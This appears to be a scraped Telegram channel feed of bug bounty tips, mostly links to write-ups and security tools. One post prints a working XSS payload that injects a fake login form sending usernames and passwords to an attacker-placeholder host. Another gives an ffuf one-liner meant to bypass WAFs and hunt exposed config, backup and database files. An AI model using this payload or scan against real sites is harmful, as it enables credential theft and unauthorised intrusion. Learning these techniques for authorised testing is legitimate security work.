bugbounty_tech | Unsorted

Telegram channel bugbounty_tech - Bug bounty Tips

2246

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r


Bug bounty Tips

☄️Subowner - A simple Python-based tool to check for subdomain takeovers in mass scanning. Supports AWS, Fastly, Shopify, Azure, etc.

🚨 https://github.com/ifconfig-me/subowner


Bug bounty Tips

💠 Introduction to SQL Injection

🔗 https://hacklido.com/blog/910-introduction-to-sql-injection


Bug bounty Tips

Top Hacking Books for 2024 (plus Resources): FREE and Paid
Tue, 17 Sep 2024 12:56:36 GMT
https://medium.com/p/394601c01904


Bug bounty Tips

Hunting APIs for Bounties: How to Hack and Win Big in Bug Bounties!: https://medium.com/@rootspaghetti/hunting-apis-for-bounties-how-to-hack-and-win-big-in-bug-bounties-942d0f4e0885?source=rss------bug_bounty-5


Bug bounty Tips

A payload to create a phishing page when you get an XSS vulnerability, like stored XSS or DOM XSS:

'><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--


Bug bounty Tips

A bypass on GitLab’s Login Email Verification via OAuth ROPC flow.

https://medium.com/@cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96


Bug bounty Tips

🔖 Writeup-Miner: Stay Updated with Medium Feeds & Real-Time Alerts for Security Enthusiasts and Tech Researchers!

Writeup-Miner is a 👩‍💻 Python script that fetches new articles from Medium RSS feeds and stores them in 👩‍💻 MongoDB or a simple .txt file. Plus, it sends you instant notifications through 📱 Telegram or 📱 Discord!

Key Features:
🟢 Scrape Medium posts via RSS feeds
🟢 Store data in MongoDB or .txt format
🟢 Set custom filters to refine content
🟢 Get real-time notifications via Telegram or Discord

How to Use:
1. Install the tool:
git clone https://github.com/0xSpidey/writeup-miner.git
cd writeup-miner
pip install -r requirements.txt

2. Configure Telegram or Discord notifications:
python3 writeup-miner.py -t <Telegram Bot Token> -c <Telegram Chat ID> -m mongo

3. Sit back and get notified when new content is published!

👩‍💻 Example Command (Telegram):
python3 writeup-miner.py -t 123456789:ABCdefGhIJKlmnoPQRstuVWxYZ -c -987654321 -m mongo

🖥 Explore More Options & Usage:
Discover additional commands, filters, and options on our GitHub page👇

📱Github: 🔗Link

#CyberSecurity #WriteupMiner #Automation #MediumRSS #bugbountyTools #bugbounty
🔹 Share & Support Us 🔹
📱 Channel : @bugbounty_tech


Bug bounty Tips

Please do boost the channel so that you guys can enjoy other features.


Bug bounty Tips

Exploring Deserialization Attacks and Their Effects

https://haymiz.dev/security/2024/09/07/deserialization-attacks/


Bug bounty Tips

A very easy bug anyone can find: https://medium.com/@malikirtizameg/a-very-easy-bug-anyone-can-find-8d2b11a768c7?source=rss------bug_bounty-5


Bug bounty Tips

How to Find IDOR Vulnerabilities: A Guide for Bug Bounty Hunters and Developers: https://cyberw1ng.medium.com/how-to-find-idor-vulnerabilities-a-guide-for-bug-bounty-hunters-and-developers-3d2ba2a766f5?source=rss------bug_bounty-5


Bug bounty Tips

Automating the CORS Vulnerability Scan: https://angixblack.medium.com/automating-the-cors-vulnerability-scan-66d57752cc36?source=rss------bug_bounty-5


Bug bounty Tips

How i got 100$ bounty: https://medium.com/@mukkumukku110/how-i-got-100-bounty-b3dd58e82e00?source=rss------bug_bounty-5


Bug bounty Tips

Subdomain Takeovers for Beginners: https://medium.com/@hichamalmakroudi/subdomain-takeovers-for-beginners-a51ed74db543?source=rss------bug_bounty-5


Bug bounty Tips

🔖JavaScript for hackers: Learn to think like a hacker

🖥 Book Details: 🔗Link
👤 Author: Gareth Heyes

#infosec #cybersecurity #hacking #pentesting #security #book #pentest #BugBounty #BugBountyBooks
🔹 Share & Support Us 🔹
💬 Channel : @Hide_Club


Bug bounty Tips

❎ Penetration Testing Roadmap Public: https://github.com/securitycipher/penetration-testing-roadmap


Bug bounty Tips

Pentesting for Web Applications

https://www.hackerone.com/penetration-testing/web-applications


Bug bounty Tips

How I Utilized AI to Discover an Amazon S3 Bucket Takeover Vulnerability in Red Bull’s Bug Bounty…: https://medium.com/@mohamedsaqibc/how-i-utilized-ai-to-discover-an-amazon-s3-bucket-takeover-vulnerability-in-red-bulls-bug-bounty-503d3c4d995f?source=rss------bug_bounty-5


Bug bounty Tips

XSS prevention steps on the front end.

Input Validation

The web application will not allow us to submit the form if the email format is invalid. This was done with the following JavaScript code:

Code: javascript

function validateEmail(email) {
    // Regex describing the accepted email format
    const re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
    // Test the current value of the login form's email field (uses jQuery)
    return re.test($("#login input[name=email]").val());
}

As we can see, this code tests the email input field and returns true or false depending on whether the value matches the regex for an email format.


Bug bounty Tips

☄️TplMap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool.

🔗https://github.com/epinna/tplmap


Bug bounty Tips

[2,500$ Bug Bounty Write-Up] Remote Code Execution (RCE) via unclaimed Node package

https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643


Bug bounty Tips

/channel/boost/bugbounty_tech


Bug bounty Tips

Try this amazing FFUF one-liner that I use mostly to bypass WAFs and for good, refined results for information disclosure bugs. You can use any wordlist:


ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -H "X-Forwarded-For: 127.0.0.1" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-Host: localhost" -t 100 -r -o results.json


Bug bounty Tips

First IDOR

Severity: critical 9-10

E.g.: example.com/parameter.aspx?id=4471


Bug bounty Tips

SQL Injetion: https://medium.com/@adhikarisudip869/sql-injetion-f6f5f4291cbc?source=rss------bug_bounty-5


Bug bounty Tips

BugBounty platforms List: https://medium.com/@loyalonlytoday/bugbounty-platforms-list-ed3a5af3a8a2?source=rss------bug_bounty-5


Bug bounty Tips

Live Bug Bounty & Penetration Testing on Real Websites: Step-by-Step Guide (Part 1): https://medium.com/@shaikhminhaz1975/live-bug-bounty-penetration-testing-on-real-websites-step-by-step-guide-part-1-971ccc9b9587?source=rss------bug_bounty-5


Bug bounty Tips

Hunting for Corporate Accounts: Exploiting IDOR and Parameter Pollution in Web Applications: https://medium.com/@tusharpuri6/hunting-for-corporate-accounts-exploiting-idor-and-parameter-pollution-in-web-applications-1792294e0c48?source=rss------bug_bounty-5


Bug bounty Tips

XSS — Cross Site Scripting: https://medium.com/@codingboltacademy/xss-cross-site-scripting-65e1981817df?source=rss------bug_bounty-5


Bug bounty Tips

😈 [ Scott Sutherland @_nullbind ]

[BLOG] Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation

🔗 https://www.netspi.com/blog/technical-blog/network-pentesting/hijacking-sql-server-credentials-with-agent-jobs-for-domain-privilege-escalation/

🐥 [ tweet ]
